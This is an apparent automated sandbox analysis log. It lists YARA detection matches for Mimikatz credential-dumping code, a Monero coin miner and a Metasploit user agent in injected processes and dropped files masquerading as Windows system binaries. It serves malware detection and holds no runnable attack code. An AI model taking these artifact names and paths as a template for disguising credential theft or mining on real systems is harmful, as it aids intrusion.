      Source: 2.3.svchost.exe.4f37468.50.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 33.0.ctfmon.exe.7c7468.4.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.30.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 29.2.svchost.exe.8e2c68.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 23.0.dllhost.exe.2860000.3.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f00000.16.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 35.0.svchost.exe.862c68.5.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b42000.19.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.56.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 35.0.svchost.exe.862c68.5.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f00000.55.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.51.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.7.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.33.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 32.0.ctfmon.exe.787468.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f00000.37.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 35.2.svchost.exe.857468.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.32.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 15.0.ctfmon.exe.997468.5.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 27.0.svchost.exe.517468.1.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.44.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 16.2.dllhostex.exe.1290000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 2.3.svchost.exe.4f42c68.56.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 23.0.dllhost.exe.2897468.1.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 35.2.svchost.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 24.0.dllhost.exe.2e37468.4.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 24.0.dllhost.exe.2e42c68.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 15.2.ctfmon.exe.997468.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.57.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b42000.58.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.30.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f00000.22.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 16.0.dllhostex.exe.1290000.1.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 2.3.svchost.exe.4f37468.32.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 33.0.ctfmon.exe.7c7468.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 15.0.ctfmon.exe.997468.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b77268.41.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b77268.54.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 16.0.dllhostex.exe.1290000.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 2.3.svchost.exe.5900000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 23.2.dllhost.exe.2897468.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f00000.10.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 33.0.ctfmon.exe.790000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 16.0.dllhostex.exe.1290000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 2.3.svchost.exe.5900000.9.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: C:\Windows\SysWOW64\WUDHostServices.exe, type: DROPPEDMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: C:\Windows\SysWOW64\dllhostex.exe, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: C:\Windows\SysWOW64\svchost.exe, Process Stats: CPU usage > 98%
      Source: Joe Sandbox View, Dropped File: C:\Windows\NetworkDistribution\adfw-2.dll F06D02359666B763E189402B7FBF9DFA83BA6F4DA2E7D037B3F9AEBEFD2D5A45
      Source: wuauclt.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: 23.2.dllhost.exe.28a2c68.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.60.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.18.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 33.0.ctfmon.exe.7c7468.4.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 29.2.svchost.exe.8a0000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 24.2.dllhost.exe.2e00000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 0.0.wuauclt.exe.250000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Metasploit_Framework_UA date = 2018-08-16, author = Florian Roth, description = Detects User Agent used in Metasploit Framework, reference = https://github.com/rapid7/metasploit-framework/commit/12a6d67be48527f5d3987e40cac2a0cbb4ab6ce7, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1743e1bd4176ffb62a1a0503a0d76033752f8bd34f6f09db85c2979c04bbdd29
      Source: 21.0.SearchProtocolHost.exe.2fa0000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 21.0.SearchProtocolHost.exe.2fd7468.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 30.0.WUDHostServices.exe.3e0000.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.2.svchost.exe.4b82a68.6.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 21.0.SearchProtocolHost.exe.2fe2c68.5.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.2.ctfmon.exe.792c68.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 33.0.ctfmon.exe.7d2c68.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.0.ctfmon.exe.750000.3.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 28.0.WUDHostServices.exe.c0000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 21.2.SearchProtocolHost.exe.2fe2c68.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 21.0.SearchProtocolHost.exe.2fe2c68.5.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 21.0.SearchProtocolHost.exe.2fd7468.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 35.0.svchost.exe.857468.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f00000.49.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 15.0.ctfmon.exe.960000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.2.ctfmon.exe.792c68.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.36.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.41.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 27.2.svchost.exe.4e0000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 23.0.dllhost.exe.28a2c68.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
